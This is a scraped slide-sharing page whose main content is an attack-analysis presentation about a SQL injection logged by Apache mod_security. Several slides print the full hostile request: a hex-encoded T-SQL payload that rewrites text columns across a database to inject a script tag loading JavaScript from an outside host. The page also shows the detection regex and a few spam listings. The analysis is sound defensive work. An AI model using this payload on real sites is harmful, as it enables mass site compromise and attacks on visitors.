Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkPichaya Morimoto
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Pichaya Morimoto
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)Shivam Sahu
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionMarios Siganos
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheLeslie Samuel
 
Stupid Canvas Tricks
Stupid Canvas TricksStupid Canvas Tricks
Stupid Canvas Tricksdeanhudson
 
The Ring programming language version 1.5.3 book - Part 40 of 184
The Ring programming language version 1.5.3 book - Part 40 of 184The Ring programming language version 1.5.3 book - Part 40 of 184
The Ring programming language version 1.5.3 book - Part 40 of 184Mahmoud Samir Fayed
 
Highlights of F# lightning talk
Highlights of F# lightning talkHighlights of F# lightning talk
Highlights of F# lightning talkmbhwork
 
Immutable Deployments with AWS CloudFormation and AWS Lambda
Immutable Deployments with AWS CloudFormation and AWS LambdaImmutable Deployments with AWS CloudFormation and AWS Lambda
Immutable Deployments with AWS CloudFormation and AWS LambdaAOE
 
Mozilla とブラウザゲーム
Mozilla とブラウザゲームMozilla とブラウザゲーム
Mozilla とブラウザゲームNoritada Shimizu
 
JavaScript Multithread or Single Thread.pptx
JavaScript Multithread or Single Thread.pptxJavaScript Multithread or Single Thread.pptx
JavaScript Multithread or Single Thread.pptxRAHITNATH
 

More Related Content

Viewers also liked

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheLeslie Samuel
 

Viewers also liked (16)

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
How to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your NicheHow to Become a Thought Leader in Your Niche
How to Become a Thought Leader in Your Niche
 

Similar to Sql injection attack_analysis_py_vo

Stupid Canvas Tricks
Stupid Canvas TricksStupid Canvas Tricks
Stupid Canvas Tricksdeanhudson
 
The Ring programming language version 1.5.3 book - Part 40 of 184
The Ring programming language version 1.5.3 book - Part 40 of 184The Ring programming language version 1.5.3 book - Part 40 of 184
The Ring programming language version 1.5.3 book - Part 40 of 184Mahmoud Samir Fayed
 
Highlights of F# lightning talk
Highlights of F# lightning talkHighlights of F# lightning talk
Highlights of F# lightning talkmbhwork
 
Immutable Deployments with AWS CloudFormation and AWS Lambda
Immutable Deployments with AWS CloudFormation and AWS LambdaImmutable Deployments with AWS CloudFormation and AWS Lambda
Immutable Deployments with AWS CloudFormation and AWS LambdaAOE
 
Mozilla とブラウザゲーム
Mozilla とブラウザゲームMozilla とブラウザゲーム
Mozilla とブラウザゲームNoritada Shimizu
 
JavaScript Multithread or Single Thread.pptx
JavaScript Multithread or Single Thread.pptxJavaScript Multithread or Single Thread.pptx
JavaScript Multithread or Single Thread.pptxRAHITNATH
 
Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...
Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...
Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...Databricks
 
A miało być tak... bez wycieków
A miało być tak... bez wyciekówA miało być tak... bez wycieków
A miało być tak... bez wyciekówKonrad Kokosa
 
Control hijacking
Control hijackingControl hijacking
Control hijackingG Prachi
 
Web 2 . .3 Development Services
Web 2 . .3 Development ServicesWeb 2 . .3 Development Services
Web 2 . .3 Development ServicesTheawaster485
 
JavaScript Libraries: The Big Picture
JavaScript Libraries: The Big PictureJavaScript Libraries: The Big Picture
JavaScript Libraries: The Big PictureSimon Willison
 
A la découverte de TypeScript
A la découverte de TypeScriptA la découverte de TypeScript
A la découverte de TypeScriptDenis Voituron
 
The Ring programming language version 1.10 book - Part 50 of 212
The Ring programming language version 1.10 book - Part 50 of 212The Ring programming language version 1.10 book - Part 50 of 212
The Ring programming language version 1.10 book - Part 50 of 212Mahmoud Samir Fayed
 
Web 2 . 0 .Zero Coding Services
Web 2 . 0 .Zero Coding ServicesWeb 2 . 0 .Zero Coding Services
Web 2 . 0 .Zero Coding ServicesTheawaster485
 
Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Fwdays
 
Ember.js Tokyo event 2014/09/22 (English)
Ember.js Tokyo event 2014/09/22 (English)Ember.js Tokyo event 2014/09/22 (English)
Ember.js Tokyo event 2014/09/22 (English)Yuki Shimada
 

Similar to Sql injection attack_analysis_py_vo (20)

Stupid Canvas Tricks
Stupid Canvas TricksStupid Canvas Tricks
Stupid Canvas Tricks
 
The Ring programming language version 1.5.3 book - Part 40 of 184
The Ring programming language version 1.5.3 book - Part 40 of 184The Ring programming language version 1.5.3 book - Part 40 of 184
The Ring programming language version 1.5.3 book - Part 40 of 184
 
Highlights of F# lightning talk
Highlights of F# lightning talkHighlights of F# lightning talk
Highlights of F# lightning talk
 
Immutable Deployments with AWS CloudFormation and AWS Lambda
Immutable Deployments with AWS CloudFormation and AWS LambdaImmutable Deployments with AWS CloudFormation and AWS Lambda
Immutable Deployments with AWS CloudFormation and AWS Lambda
 
Mozilla とブラウザゲーム
Mozilla とブラウザゲームMozilla とブラウザゲーム
Mozilla とブラウザゲーム
 
JavaScript Multithread or Single Thread.pptx
JavaScript Multithread or Single Thread.pptxJavaScript Multithread or Single Thread.pptx
JavaScript Multithread or Single Thread.pptx
 
Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...
Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...
Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...
 
Python, WebRTC and You (v2)
Python, WebRTC and You (v2)Python, WebRTC and You (v2)
Python, WebRTC and You (v2)
 
A miało być tak... bez wycieków
A miało być tak... bez wyciekówA miało być tak... bez wycieków
A miało być tak... bez wycieków
 
AWS EC2
AWS EC2AWS EC2
AWS EC2
 
Control hijacking
Control hijackingControl hijacking
Control hijacking
 
Web 2 . .3 Development Services
Web 2 . .3 Development ServicesWeb 2 . .3 Development Services
Web 2 . .3 Development Services
 
JavaScript Web Workers
JavaScript Web WorkersJavaScript Web Workers
JavaScript Web Workers
 
JavaScript Libraries: The Big Picture
JavaScript Libraries: The Big PictureJavaScript Libraries: The Big Picture
JavaScript Libraries: The Big Picture
 
A la découverte de TypeScript
A la découverte de TypeScriptA la découverte de TypeScript
A la découverte de TypeScript
 
The Ring programming language version 1.10 book - Part 50 of 212
The Ring programming language version 1.10 book - Part 50 of 212The Ring programming language version 1.10 book - Part 50 of 212
The Ring programming language version 1.10 book - Part 50 of 212
 
Web 2 . 0 .Zero Coding Services
Web 2 . 0 .Zero Coding ServicesWeb 2 . 0 .Zero Coding Services
Web 2 . 0 .Zero Coding Services
 
Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"
 
Ember.js Tokyo event 2014/09/22 (English)
Ember.js Tokyo event 2014/09/22 (English)Ember.js Tokyo event 2014/09/22 (English)
Ember.js Tokyo event 2014/09/22 (English)
 
Streams in Node.js
Streams in Node.jsStreams in Node.js
Streams in Node.js
 

Recently uploaded

Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 

Recently uploaded (20)

Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 

Sql injection attack_analysis_py_vo

  • 1. Let’s play a game A true story of a web attack analysis
  • 2. Introduction  Once upon a time, there was a personal webserver running Apache with mod_security(*) module  And then, something interesting happened... (*) An extremely useful module providing an additional level of security @JirkaV
  • 3. The logfile entry  This entry appeared in the log: Message: Warning. Pattern match "(?:b(?:(?:s(?:electb(?:.{1,100}?b(?:(?:length|count|top)b.{1,100}?bfrom|fromb .{1,100}?bwhere)|.*?b(?:d(?:umpb.*bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_( ?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:;DECLARE @S CHAR(4000);SET @S. [id "950001"] [msg "SQL Injection Attack. Matched signature <cast(>"] [severity "CRITICAL"] GET /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420 7661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43 7572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379 736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642061 2E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722062 2E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C 4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B 275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D 272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074 207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043 20454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757273 6F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
  • 4. The logfile entry  This entry appeared in the log: Message: Warning. Pattern match "(?:b(?:(?:s(?:electb(?:.{1,100}?b(?:(?:length|count|top)b.{1,100}?bfrom|fromb .{1,100}?bwhere)|.*?b(?:d(?:umpb.*bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_( ?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:;DECLARE @S CHAR(4000);SET @S. [id "950001"] [msg "SQL Injection Attack. Matched signature <cast(>"] [severity "CRITICAL"] GET /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420 7661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43 7572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379 736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642061 2E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722062 2E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C 4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B 275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D 272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074 207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043 20454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757273 6F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
  • 5. Peeling the first layer  Let’s focus on the important stuff:  /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
  • 6. Peeling the first layer  Let’s focus on the important stuff:  DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); @JirkaV
